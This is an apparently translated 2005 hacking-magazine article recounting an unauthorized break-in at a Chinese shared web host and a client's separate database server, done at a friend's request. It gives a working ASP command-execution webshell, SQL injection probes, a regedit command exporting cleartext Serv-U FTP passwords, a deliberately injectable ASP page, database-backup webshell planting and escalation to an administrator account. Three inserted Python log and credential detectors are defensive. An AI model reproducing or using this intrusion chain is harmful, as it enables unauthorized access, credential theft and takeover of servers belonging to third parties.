Million Network: I got in twice - Vulnerability early warning - Black Bar Security Net

Source: www.myhack58.com (MYHACK58:6220053005)
Author: 佚名 (anonymous)
Date: Oct 03, 2005

Article authors: Andyower, Angel doll
Information source: Evil Octal Information Security Team, www.eviloctal.com

Note: this article was published in the September 2005 issue of Hacker Defense magazine. If you reprint it, please credit the authors.

Recently a friend asked me to help him get into a site that held a lot of information he wanted. He gave me the address www.*** d.com. For certain reasons most of the screenshots for this article are not provided; I hope you will understand.

The first penetration
I started with the main site. After logging on and looking around, almost everything on the main site was static; only the news section was dynamic, and the news pages with a possible injection point were served from another IP, 220.194../news.asp?id=111. I tried appending "and 1=1" and "and 1=2", and also "news.asp?id=1'11", "news.asp?id=11;1", "news.asp?id=111" and "news.asp?id=11--1". All of them returned normally, which means the characters ', ", ;, -- and the space had all been filtered. I then went over to 220.194.. for a look and found a Dvbbs (动网) forum. It had been set up only a few days earlier and had fewer than 50 registered users; in case the build date had been faked, I tested the latest vulnerabilities against it, without success. Cross-site scripting? The administrator never came to the forum.
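The "and 1=1" / "and 1=2" pair described above is a recognisable probe in web-server logs. The following detector is an added example written for this page, not code from the article; it runs over constructed sample lines in a simplified layout and flags a client that sent both a true and a false condition on the same parameter value:

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample web-server log lines in a simplified "date time ip method
# path query status" layout (not a real IIS W3C log). 192.0.2.10 sends the
# "and 1=1" / "and 1=2" pair against news.asp?id=111 as the article describes.
SAMPLE_WEB_LOG = """\
2005-10-02 22:10:01 192.0.2.10 GET /news.asp id=111 200
2005-10-02 22:10:05 192.0.2.10 GET /news.asp id=111+and+1=1 200
2005-10-02 22:10:09 192.0.2.10 GET /news.asp id=111+and+1=2 200
2005-10-02 22:11:00 198.51.100.5 GET /news.asp id=112 200
2005-10-02 22:12:30 198.51.100.5 GET /news.asp id=112+and+2=2 200
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")
# A boolean comparison appended to the original parameter value, e.g. "111 and 1=2"
BOOL_TAIL_RE = re.compile(r"^(.*?)\s+(?:and|or)\s+(\d+)\s*=\s*(\d+)$", re.IGNORECASE)

def parse_web_log(text):
    """Return one (ip, path, param, value) tuple per query parameter per request."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _, ip, _, path, query, _ = m.groups()
        # parse_qsl decodes '+' to a space, so "111+and+1=1" becomes "111 and 1=1"
        for param, value in parse_qsl(query, keep_blank_values=True):
            events.append((ip, path, param, value))
    return events

def find_boolean_probes(events):
    """Flag (ip, path, param, base_value) where one client sent both a true
    (n=n) and a false (n=m) condition on the same base value. A single
    tautology is ambiguous; the true/false pair is the actual probe."""
    seen = defaultdict(set)
    for ip, path, param, value in events:
        m = BOOL_TAIL_RE.match(value)
        if not m:
            continue
        base, lhs, rhs = m.groups()
        seen[(ip, path, param, base)].add("true" if lhs == rhs else "false")
    return sorted(key for key, kinds in seen.items() if kinds == {"true", "false"})
```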
Meanwhile the scan report for www.*** y.com came back: ports 21, 80 and 3389 were open. I tried ftp. The returned banner was as follows:

C:\Documents and Settings\Andyower>ftp www.*** d.com
Connected to www.tnbfriend.com.
220-Microsoft FTP for WinSock ready...
220 (you are welcome to use China million net web hosting, this space prohibit the use of chat rooms, Arena games, online video broadcast
Put, professional download and other serious consumption of the server resources of program,Thank you for your cooperation!)
User (www.tnbfriend.com:(none)):

The banner shows "Microsoft FTP for WinSock ready", but it is plainly Serv-U in disguise: you think changing your coat means I won't recognise you? The giveaway is the "220"; in general, when the greeting comes back in this "220" form it is probably Serv-U. This is a Million Network (万网) virtual host. I had heard their virtual hosts had been broken into many times and did not know whether a cross-site (旁注) point still existed. Set that aside: since it is a shared host, a cross-site attack is almost certainly possible.
I opened Domain 3.5, set the parameters, and before long had the result: a great many sites were bundled on this host. I did not feel like wading through them, pure manual labour, so thanks to Angel doll I handed the job to her: find one vulnerable site and get a webshell. (Angel doll: why is it always me who gets hurt...)
Whether because of Angel doll's good luck or good character, in under ten minutes she had gotten into an old, neglected Dvbbs site and had a one-line Trojan written; all I had to do was connect. I prefer the Ocean Top (海洋顶端) ASP Trojan; together with the one-liner it is very easy to use. Once connected I saw many sites. See Figure 1.
Clicking into one, I found there was no permission; apparently each user is given a separate account. Then I looked at other things: cmd could not be executed, and after uploading a cmd.exe it still could not be executed. The Ocean version I was using was not the latest and lacked the view-components function, and without viewing the components a lot of things cannot be determined. So I uploaded the other Ocean version and viewed the components. See Figure 2.
The two most important components were usable: Shell.Application and Wscript.Shell. That is, Wscript.Shell had been renamed but was still there, which makes things no harder for us. I put the code up immediately; its content is as follows:
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c " & request("cmd")).stdout.readall%>
</textarea>
</div>
<% end if %>

Submit cmd.asp?fpath=<path to your cmd.exe>&cmd=<command>. See Figure 3.
Now cmd commands can be run. I want to point out here that when the component probe reports that Wscript.Shell does not exist, it may still be possible to execute commands. Addendum: while finishing this article I suddenly found that Ocean actually provides this function directly; I had just never used it. On the Wscript.Shell execution page, click "use Wscript.Shell", then in the command box below type the path of your own cmd.exe, for example:
"f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an". The effect is the same as what I did above. (Thanks to brother Lcx for providing such a good Trojan.)
In the netstat -an output one line stood out: "TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING", just as expected. Since that was the case, I got out the Serv-U local privilege escalation program I had ready. Several tries failed; could the password have been changed? Earlier I had tried to traverse directories: in "C:\Documents and Settings\All Users\Start Menu\Programs" I found the Serv-U directory, downloaded the shortcut, got the path, and tried to jump to the Serv-U directory, but I could not; it was restricted. Give up here? Of course not; to stop at this step would be a pity. I don't know whether you remember the article in the June issue of Hacker Defense by rainy day [F.S.T], "Serv-U FTP local privilege escalation vulnerability exposed once more". Probably few people noticed it, maybe because its constraints made it look of little use, but I can tell you the success rate is as high as 80%. Why? Because virtual host providers are now afraid of the Serv-U local privilege escalation vulnerabilities, so they store all the administrators' passwords in the registry, which is exactly the precondition rainy day's article requires: the accounts and passwords stored in the registry. Readers who don't remember, please open that issue again. I won't go on; let's see how to do it directly. In the webshell, execute the command:
regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u"
This exports all the Serv-U account passwords from the registry into the file C:\Documents and Settings\All Users\Documents\system.ini. The precondition, of course, is that C:\Documents and Settings\All Users\Documents\ is writable; if it is not, pick another directory you can write to. Then download system.ini and open it. Wow! See Figure 4.
All the accounts' passwords are in cleartext. A note here: because our permissions are only Guests, there is no permission to write a single administrator account and password into the registry. To prove this to myself I even tested it on my own machine: Guests have no permission to modify, add or remove registry entries. I tried many approaches; none worked. Jumping to c:\winnt\, the KB*.log files are the patch logs; the latest patch was applied yesterday, probably because Windows automatic updates is switched on; I doubt the administrator is that diligent.
Now we have every user's FTP account and password; the key is to find the FTP account that corresponds to the target website. But the host's directories are numbered sequentially, so there is no way to guess from a directory which site it belongs to, and there were over 400 sites! Testing by hand would drive anyone mad. I took a break; this is physical labour, let Angel doll carry on. (Angel doll: why am I the one injured again...) As for how, once you have all the FTP accounts and passwords, to tell which FTP account corresponds to which site, here it is: first find an unusual page name on the target site, then log in with each account in turn and use the ls command to see whether that file exists. If it does not, move to the next; if it does, look carefully at the other files to see whether they match and whether the site's other files are present. Confused? Never mind; an example explains everything.
First, on the www.*** d.com website, find a few distinctive files. Here I found http://www.*** d.com/sqrd.htm and http://www.*** d.com/yuq.htm, which gives the file names sqrd.htm and yuq.htm. Then, starting from the account cn23001, log in with the account and password obtained. If there is no sqrd.htm after logging in, skip straight to the next; if there is a sqrd.htm, check whether yuq.htm is there too. If both are, this is very probably the FTP account. By the way, I forgot to mention that two things in the system.ini file matter. First: [HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\Domains\1\UserSettings\cn23017], where the account is cn23017. Second: the password is in the "Password"= line that follows. Try them one by one, slowly. I went to bed, tired.
When I woke up, Angel doll told me, very depressed, that she still had not found it; she had tried up to cn23217 and was dead tired. An internet search for related software turned up nothing. Forget it; as our great leader Chairman Mao said, do it yourself and you will have food and clothing. So I wrote a program to brute-force it in a targeted way. After some time the program was done; its interface is shown in Figure 5.
The interface is a bit ugly because it was done in a hurry: writing the program took just over half an hour, while polishing it would have taken a few more hours, a waste of time. It works, and that is enough. About the fields: "ftp host name" needs no explanation. "Special file names" is the special file name of the site whose FTP account you are after, as explained above. "Start from FTP account number ...": fill this in as you need, because during testing the program sometimes hung after reading 100-odd accounts, and restarting from the beginning was too troublesome, so I added this option: if it hangs, there is no need to re-read everything. By default write 1, meaning test from the first FTP account in the file. Nothing else needs to be filled in; just wait for the account to come out. One more thing: to save time, and because I am not used to multithreading, a dialog box that pops up automatically stands in for threads and stops the program from deadlocking. If people like it I will improve it next time; for now this will do. Below is my test. See Figure 6.
I started reading from the 4th account. When a login finds the file index.asp on that FTP account, the account and password are listed; easy. Someone may ask: what if several sites have the same special file name? Then you have to do some of the work yourself; you can't be that lazy.
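The account walk described above logs into many different FTP accounts from one client in a short time, with valid passwords. The following detector is an added example written for this page, not code from the article or its tool; it parses constructed sample lines in a simplified layout (not Serv-U's own log format) and reports clients that logged into an unusual number of distinct accounts within a sliding window:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a simplified "date time ip user result" layout
# (not Serv-U's real log format). 192.0.2.10 walks through the cn23xxx
# accounts with valid passwords; 198.51.100.5 is an ordinary user.
SAMPLE_FTP_LOG = """\
2005-10-02 23:40:01 192.0.2.10 cn23001 LOGIN_OK
2005-10-02 23:40:03 192.0.2.10 cn23002 LOGIN_OK
2005-10-02 23:40:05 192.0.2.10 cn23003 LOGIN_OK
2005-10-02 23:40:07 192.0.2.10 cn23004 LOGIN_OK
2005-10-02 23:40:09 192.0.2.10 cn23005 LOGIN_OK
2005-10-02 23:40:11 192.0.2.10 cn23006 LOGIN_OK
2005-10-02 23:41:00 198.51.100.5 cn23050 LOGIN_OK
2005-10-02 23:55:00 198.51.100.5 cn23050 LOGIN_FAIL
2005-10-02 23:56:00 198.51.100.5 cn23050 LOGIN_OK
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (LOGIN_OK|LOGIN_FAIL)$")

def parse_ftp_log(text):
    """Return (timestamp, ip, user, result) tuples for well-formed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events

def find_account_sprays(events, window=timedelta(minutes=10), min_accounts=5):
    """Map client IP -> largest number of distinct accounts it logged into
    within any window. Successful logins are counted on purpose: the walk
    uses valid passwords, so counting failures alone would miss it."""
    by_ip = defaultdict(list)
    for ts, ip, user, _ in sorted(events):
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, hits in by_ip.items():
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            users = {user for _, user in hits[start:end + 1]}
            if len(users) >= min_accounts:
                alerts[ip] = max(len(users), alerts.get(ip, 0))
    return alerts
```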
Within a few minutes the test was done. One account had the special file name I had entered; that was the one. I FTPed in by hand to look: it was this site. Free sample! www.*** d.com, you thought you had hidden so deep that I could not find you! Haha! As if I would let you get away! The ls command showed a conn.asp file; opening it revealed the connection information for yet another host:
<%
dim conn
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=220.194..; uid=j****;pwd=d******;database=d*****;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
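On a shared host, a conn.asp like the one above is readable by any co-tenant who reaches the directory, and it hands over credentials to a second machine. The following audit routine is an added example written for this page, not code from the article; it scans ASP source for ADO connection strings that embed a uid/pwd pair and reports where they are, without printing the password itself. The sample file and its values are constructed placeholders:

```python
import re

# Constructed sample modelled on the conn.asp the article found; server, user,
# password and database are placeholders, not the real ones.
SAMPLE_CONN_ASP = '''<%
dim conn
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=192.0.2.20;uid=webuser;pwd=Secret123;database=shop;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
'''

# A double-quoted VBScript string literal that carries a credential key
CONNSTR_RE = re.compile(r'"([^"]*\b(?:uid|pwd|password|user id)\s*=[^"]*)"', re.IGNORECASE)

def parse_connection_string(connstr):
    """Split an ADO/OLE DB connection string into a lower-cased key -> value dict."""
    parts = {}
    for item in connstr.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            parts[key.strip().lower()] = value.strip()
    return parts

def find_embedded_credentials(source):
    """Report each line of an ASP source that embeds database credentials.
    Only the password length is returned, so the report can be shared
    without re-exposing the secret it is warning about."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = CONNSTR_RE.search(line)
        if not m:
            continue
        parts = parse_connection_string(m.group(1))
        secret = parts.get("pwd") or parts.get("password")
        findings.append({
            "line": lineno,
            "server": parts.get("server") or parts.get("data source"),
            "uid": parts.get("uid") or parts.get("user id"),
            "password_length": len(secret) if secret else 0,
        })
    return findings
```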

The second penetration

This time Million Network was deadly! Now let's attack the site's other server, 220.194... This server stands alone; the cross-site approach had failed there because it hosts no other website. Now let's see where you can run; we'll get him together! For certain reasons no screenshots are provided from here on; I hope you will understand. Now that we have the database account and password, and his site connects to it directly from ASP, he has almost certainly opened the MS SQL port. I connected with an SQL client and found that the permission was db_owner, so many commands cannot be used, and reading out the other side's web path by hand is too much trouble. I also wanted a look at his structure, and I had the SQL account and password. His server has no injection vulnerability, but I can forge one for him: build an injection point myself and then use NBSI to guess the rest of the information, which is much faster.
I immediately set up IIS locally and put his conn.asp into my virtual directory. Then I built a file a.asp with an injection point, assuming the admin table exists. The code is as follows:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
' id is concatenated unfiltered, so this page is injectable by design;
' if there is no admin table, create a table and a field yourself
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>
Done, that simple; now let him expose all the other information himself. I opened NBSI and injected like mad; every piece of information came out. Browsing his directories slowly: the web directory is d:\wwww, and Serv-U is installed as well. Since this server is their own it is not so professional; it should not have any defences. Get a webshell first: db_owner has the BACKUP DATABASE permission, so I used xiaolu's getwebshell.exe to back the database up to d:\www\1.asa. Result: it would not run! Error! The damned database already contained "<%". No help for it; my luck has never been very good, and that is a fine excuse. I slowly searched the database for which fields contained "<%", to delete them!
Another half hour to find it, an SQL statement to delete it, then back up again, and this time it succeeded. I had the webshell, but it did not look good, so I wrote another webshell in, then escalated through Serv-U, added an account, set it as administrator and logged in on 3389: cool as hell! What was used, the account and password, went to my friend; what he does with his own things is his business. My task was done.